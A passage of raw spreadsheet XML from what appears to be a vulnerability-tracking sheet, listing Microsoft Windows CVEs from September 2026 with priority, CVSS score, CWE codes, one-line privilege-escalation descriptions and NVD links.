elevate privileges locally.</t></is></c><c r="T949" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t></is></c></row><row r="950"><c r="A950" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B950" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C950" s="5" t="inlineStr"><is><t>CVE-2026-69567</t></is></c><c r="D950" s="5" t="n"><v>7</v></c><c r="E950" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F950" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G950" s="5" t="inlineStr" /><c r="H950" s="5" t="n"><v>0.002</v></c><c r="I950" s="5" t="inlineStr" /><c r="J950" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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50" s="5" t="inlineStr" /><c r="M950" s="5" t="inlineStr" /><c r="N950" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O950" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P950" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q950" s="5" t="inlineStr" /><c r="R950" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S950" s="5" t="inlineStr"><is><t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T950" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t></is></c></row><row r="951"><c r="A951" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B951" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C951" s="5" t="inlineStr"><is><t>CVE-2026-69573</t></is></c><c r="D951" s="5" t="n"><v>7</v></c><c r="E951" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F951" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G951" s="5" t="inlineStr" /><c r="H951" s="5" t="n"><v>0.003</v></c><c r="I951" s="5" t="inlineStr" /><c r="J951" s="5" t="inlineStr" /><c r="K951" s="5" t="inlineStr" /><c r="L951" s="5" t="inlineStr" /><c r="M951" s="5" t="inlineStr" /><c r="N951" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O951" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P951" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q951" s="5" t="inlineStr" /><c r="R951" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S951" s="5" t="inlineStr"><is><t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T951" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t></is></c></row><row r="952"><c r="A952" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B952" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C952" s="5" t="inlineStr"><is><t>CVE-2026-69574</t></is></c><c r="D952" s="5" t="n"><v>7</v></c><c r="E952" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F952" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G952" s="5" t="inlineStr" /><c r="H952" s="5" t="n"><v>0.003</v></c><c r="I952" s="5" t="inlineStr" /><c r="J952" s="5" t="inlineStr" /><c r="K952" s="5" t="inlineStr" /><c r="L952" s="5" t="inlineStr" /><c r="M952" s="5" t="inlineStr" /><c r="N952" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q952" s="5" t="inlineStr" /><c r="R952" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S952" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T952" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t></is></c></row><row r="953"><c r="A953" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B953" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C953" s="5" t="inlineStr"><is><t>CVE-2026-69575</t></is></c><c r="D953" s="5" t="n"><v>7</v></c><c r="E953" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F953" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G953" s="5" t="inlineStr" /><c r="H953" s="5" t="n"><v>0.003</v></c><c r="I953" s="5" t="inlineStr" /><c r="J953" s="5" t="inlineStr" /><c r="K953" s="5" t="inlineStr" /><c r="L953" s="5" t="inlineStr" /><c r="M953" s="5" t="inlineStr" /><c r="N953" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O953" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P953" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q953" s="5" t="inlineStr" /><c r="R953" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S953" s="5" t="inlineStr"><is><t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T953" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t></is></c></row><row r="954"><c r="A954" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B954" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C954" s="5" t="inlineStr"><is><t>CVE-2026-69578</t></is></c><c r="D954" s="5" t="n"><v>7</v></c><c r="E954" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F954" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G954" s="5" t="inlineStr" /><c r="H954" s="5" t="n"><v>0.002</v></c><c r="I954" s="5" t="inlineStr" /><c r="J954" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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54" s="5" t="inlineStr" /><c r="M954" s="5" t="inlineStr" /><c r="N954" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O954" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P954" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q954" s="5" t="inlineStr" /><c r="R954" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S954" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T954" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t></is></c></row><row r="955"><c r="A955" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B955" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C955" s="5" t="inlineStr"><is><t>CVE-2026-69581</t></is></c><c r="D955" s="5" t="n"><v>7</v></c><c r="E955" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F955" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G955" s="5" t="inlineStr" /><c r="H955" s="5" t="n"><v>0.002</v></c><c r="I955" s="5" t="inlineStr" /><c r="J955" s="5" t="inlineStr" /><c r="K955" s="5" t="inlineStr" /><c r="L955" s="5" t="inlineStr" /><c r="M955" s="5" t="inlineStr" /><c r="N955" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O955" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P955" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q955" s="5" t="inlineStr" /><c r="R955" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S955" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T955" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t></is></c></row><row r="956"><c r="A956" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B956" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C956" s="5" t="inlineStr"><is><t>CVE-2026-69600</t></is></c><c r="D956" s="5" t="n"><v>7</v></c><c r="E956" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F956" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G956" s="5" t="inlineStr" /><c r="H956" s="5" t="n"><v>0.003</v></c><c r="I956" s="5" t="inlineStr" /><c r="J956" s="5" t="inlineStr" /><c r="K956" s="5" t="inlineStr" /><c r="L956" s="5" t="inlineStr" /><c r="M956" s="5" t="inlineStr" /><c r="N956" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O956" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P956" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q956" s="5" t="inlineStr" /><c r="R956" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S956" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T956" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t></is></c></row><row r="957"><c r="A957" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B957" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C957" s="5" t="inlineStr"><is><t>CVE-2026-69605</t></is></c><c r="D957" s="5" t="n"><v>7</v></c><c r="E957" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F957" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G957" s="5" t="inlineStr" /><c r="H957" s="5" t="n"><v>0.003</v></c><c r="I957" s="5" t="inlineStr" /><c r="J957" s="5" t="inlineStr" /><c r="K957" s="5" t="inlineStr" /><c r="L957" s="5" t="inlineStr" /><c r="M957" s="5" t="inlineStr" /><c r="N957" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O957" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P957" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q957" s="5" t="inlineStr" /><c r="R957" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S957" s="5" t="inlineStr"><is><t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T957" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t></is></c></row><row r="958"><c r="A958" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B958" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C958" s="5" t="inlineStr"><is><t>CVE-2026-69606</t></is></c><c r="D958" s="5" t="n"><v>7</v></c><c r="E958" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F958" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G958" s="5" t="inlineStr" /><c r="H958" s="5" t="n"><v>0.003</v></c><c r="I958" s="5" t="inlineStr" /><c r="J958" s="5" t="inlineStr" /><c r="K958" s="5" t="inlineStr" /><c r="L958" s="5" t="inlineStr" /><c r="M958" s="5" t="inlineStr" /><c r="N958" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O958" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P958" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q958" s="5" t="inlineStr" /><c r="R958" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S958" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T958" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t></is></c></row><row r="959"><c r="A959" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B959" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C959" s="5" t="inlineStr"><is><t>CVE-2026-69610</t></is></c><c r="D959" s="5" t="n"><v>7</v></c><c r="E959" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F959" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G959" s="5" t="inlineStr" /><c r="H959" s="5" t="n"><v>0.003</v></c><c r="I959" s="5" t="inlineStr" /><c r="J959" s="5" t="inlineStr" /><c r="K959" s="5" t="inlineStr" /><c r="L959" s="5" t="inlineStr" /><c r="M959" s="5" t="inlineStr" /><c r="N959" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O959" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P959" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q959" s="5" t="inlineStr" /><c r="R959" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S959" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T959" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t></is></c></row><row r="960"><c r="A960" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B960" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C960" s="5" t="inlineStr"><is><t>CVE-2026-69611</t></is></c><c r="D960" s="5" t="n"><v>7</v></c><c r="E960" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F960" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G960" s="5" t="inlineStr" /><c r="H960" s="5" t="n"><v>0.003</v></c><c r="I960" s="5" t="inlineStr" /><c r="J960" s="5" t="inlineStr" /><c r="K960" s="5" t="inlineStr" /><c r="L960" s="5" t="inlineStr" /><c r="M960" s="5" t="inlineStr" /><c r="N960" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O960" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P960" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q960" s="5" t="inlineStr" /><c r="R960" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S960" s="5" t="inlineStr"><is><t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T960" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t></is></c></row><row r="961"><c r="A961" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B961" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C961" s="5" t="inlineStr"><is><t>CVE-2026-69613</t></is></c><c r="D961" s="5" t="n"><v>7</v></c><c r="E961" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F961" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G961" s="5" t="inlineStr" /><c r="H961" s="5" t="n"><v>0.003</v></c><c r="I961" s="5" t="inlineStr" /><c r="J961" s="5" t="inlineStr" /><c r="K961" s="5" t="inlineStr" /><c r="L961" s="5" t="inlineStr" /><c r="M961" s="5" t="inlineStr" /><c r="N961" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O961" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P961" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q961" s="5" t="inlineStr" /><c r="R961" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S961" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T961" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t></is></c></row><row r="962"><c r="A962" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B962" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C962" s="5" t="inlineStr"><is><t>CVE-2026-69617</t></is></c><c r="D962" s="5" t="n"><v>7</v></c><c r="E962" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F962" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G962" s="5" t="inlineStr" /><c r="H962" s="5" t="n"><v>0.003</v></c><c r="I962" s="5" t="inlineStr" /><c r="J962" s="5" t="inlineStr" /><c r="K962" s="5" t="inlineStr" /><c r="L962" s="5" t="inlineStr" /><c r="M962" s="5" t="inlineStr" /><c r="N962" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O962" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P962" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q962" s="5" t="inlineStr" /><c r="R962" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S962" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T962" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t></is></c></row><row r="963"><c r="A963" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B963" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C963" s="5" t="inlineStr"><is><t>CVE-2026-69621</t></is></c><c r="D963" s="5" t="n"><v>7</v></c><c r="E963" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F963" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G963" s="5" t="inlineStr" /><c r="H963" s="5" t="n"><v>0.003</v></c><c r="I963" s="5" t="inlineStr" /><c r="J963" s="5" t="inlineStr" /><c r="K963" s="5" t="inlineStr" /><c r="L963" s="5" t="inlineStr" /><c r="M963" s="5" t="inlineStr" /><c r="N963" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O963" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P963" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q963" s="5" t="inlineStr" /><c r="R963" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S963" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T963" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t></is></c></row><row r="964"><c r="A964" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B964" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C964" s="5" t="inlineStr"><is><t>CVE-2026-69630</t></is></c><c r="D964" s="5" t="n"><v>7</v></c><c r="E964" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F964" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G964" s="5" t="inlineStr" /><c r="H964" s="5" t="n"><v>0.003</v></c><c r="I964" s="5" t="inlineStr" /><c r="J964" s="5" t="inlineStr" /><c r="K964" s="5" t="inlineStr" /><c r="L964" s="5" t="inlineStr" /><c r="M964" s="5" t="inlineStr" /><c r="N964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O964" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P964" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q964" s="5" t="inlineStr" /><c r="R964" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S964" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T964" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t></is></c></row><row r="965"><c r="A965" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B965" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C965" s="5" t="inlineStr"><is><t>CVE-2026-69645</t></is></c><c r="D965" s="5" t="n"><v>7</v></c><c r="E965" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F965" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G965" s="5" t="inlineStr" /><c r="H965" s="5" t="n"><v>0.003</v></c><c r="I965" s="5" t="inlineStr" /><c r="J965" s="5" t="inlineStr" /><c r="K965" s="5" t="inlineStr" /><c r="L965" s="5" t="inlineStr" /><c r="M965" s="5" t="inlineStr" /><c r="N965" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O965" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P965" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q965" s="5" t="inlineStr" /><c r="R965" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S965" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T965" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t></is></c></row><row r="966"><c r="A966" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B966" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C966" s="5" t="inlineStr"><is><t>CVE-2026-69648</t></is></c><c r="D966" s="5" t="n"><v>7</v></c><c r="E966" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F966" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G966" s="5" t="inlineStr" /><c r="H966" s="5" t="n"><v>0.003</v></c><c r="I966" s="5" t="inlineStr" /><c r="J966" s="5" t="inlineStr" /><c r="K966" s="5" t="inlineStr" /><c r="L966" s="5" t="inlineStr" /><c r="M966" s="5" t="inlineStr" /><c r="N966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O966" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P966" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q966" s="5" t="inlineStr" /><c r="R966" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S966" s="5" t="inlineStr"><is><t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T966" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t></is></c></row><row r="967"><c r="A967" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B967" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C967" s="5" t="inlineStr"><is><t>CVE-2026-69652</t></is></c><c r="D967" s="5" t="n"><v>7</v></c><c r="E967" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F967" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G967" s="5" t="inlineStr" /><c r="H967" s="5" t="n"><v>0.003</v></c><c r="I967" s="5" t="inlineStr" /><c r="J967" s="5" t="inlineStr" /><c r="K967" s="5" t="inlineStr" /><c r="L967" s="5" t="inlineStr" /><c r="M967" s="5" t="inlineStr" /><c r="N967" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O967" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P967" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q967" s="5" t="inlineStr" /><c r="R967" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S967" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T967" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t></is></c></row><row r="968"><c r="A968" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B968" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C968" s="5" t="inlineStr"><is><t>CVE-2026-69654</t></is></c><c r="D968" s="5" t="n"><v>7</v></c><c r="E968" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F968" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G968" s="5" t="inlineStr" /><c r="H968" s="5" t="n"><v>0.003</v></c><c r="I968" s="5" t="inlineStr" /><c r="J968" s="5" t="inlineStr" /><c r="K968" s="5" t="inlineStr" /><c r="L968" s="5" t="inlineStr" /><c r="M968" s="5" t="inlineStr" /><c r="N968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O968" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P968" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q968" s="5" t="inlineStr" /><c r="R968" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S968" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T968" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t></is></c></row><row r="969"><c r="A969" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B969" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C969" s="5" t="inlineStr"><is><t>CVE-2026-69682</t></is></c><c r="D969" s="5" t="n"><v>7</v></c><c r="E969" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F969" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G969" s="5" t="inlineStr" /><c r="H969" s="5" t="n"><v>0.002</v></c><c r="I969" s="5" t="inlineStr" /><c r="J969" s="5" t="inlineStr" /><c r="K969" s="5" t="inlineStr" /><c r="L969" s="5" t="inlineStr" /><c r="M969" s="5" t="inlineStr" /><c r="N969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O969" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P969" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q969" s="5" t="inlineStr" /><c r="R969" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S969" s="5" t="inlineStr"><is><t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T969" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t></is></c></row><row r="970"><c r="A970" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B970" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C970" s="5" t="inlineStr"><is><t>CVE-2026-69692</t></is></c><c r="D970" s="5" t="n"><v>7</v></c><c r="E970" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F970" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G970" s="5" t="inlineStr" /><c r="H970" s="5" t="n"><v>0.003</v></c><c r="I970" s="5" t="inlineStr" /><c r="J970" s="5" t="inlineStr" /><c r="K970" s="5" t="inlineStr" /><c r="L970" s="5" t="inlineStr" /><c r="M970" s="5" t="inlineStr" /><c r="N970" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O970" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P970" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q970" s="5" t="inlineStr" /><c r="R970" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S970" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T970" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t></is></c></row><row r="971"><c r="A971" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B971" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C971" s="5" t="inlineStr"><is><t>CVE-2026-69693</t></is></c><c r="D971" s="5" t="n"><v>7</v></c><c r="E971" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F971" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G971" s="5" t="inlineStr" /><c r="H971" s="5" t="n"><v>0.003</v></c><c r="I971" s="5" t="inlineStr" /><c r="J971" s="5" t="inlineStr" /><c r="K971" s="5" t="inlineStr" /><c r="L971" s="5" t="inlineStr" /><c r="M971" s="5" t="inlineStr" /><c r="N971" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O971" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P971" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q971" s="5" t="inlineStr" /><c r="R971" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S971" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T971" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t></is></c></row><row r="972"><c r="A972" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B972" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C972" s="5" t="inlineStr"><is><t>CVE-2026-69694</t></is></c><c r="D972" s="5" t="n"><v>7</v></c><c r="E972" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F972" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G972" s="5" t="inlineStr" /><c r="H972" s="5" t="n"><v>0.017</v></c><c r="I972" s="5" t="inlineStr" /><c r="J972" s="5" t="inlineStr" /><c r="K972" s="5" t="inlineStr" /><c r="L972" s="5" t="inlineStr" /><c r="M972" s="5" t="inlineStr" /><c r="N972" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O972" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P972" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q972" s="5" t="inlineStr" /><c r="R972" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S972" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T972" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t></is></c></row><row r="973"><c r="A973" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B973" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C973" s="5" t="inlineStr"><is><t>CVE-2026-69708</t></is></c><c r="D973" s="5" t="n"><v>7</v></c><c r="E973" s="5" 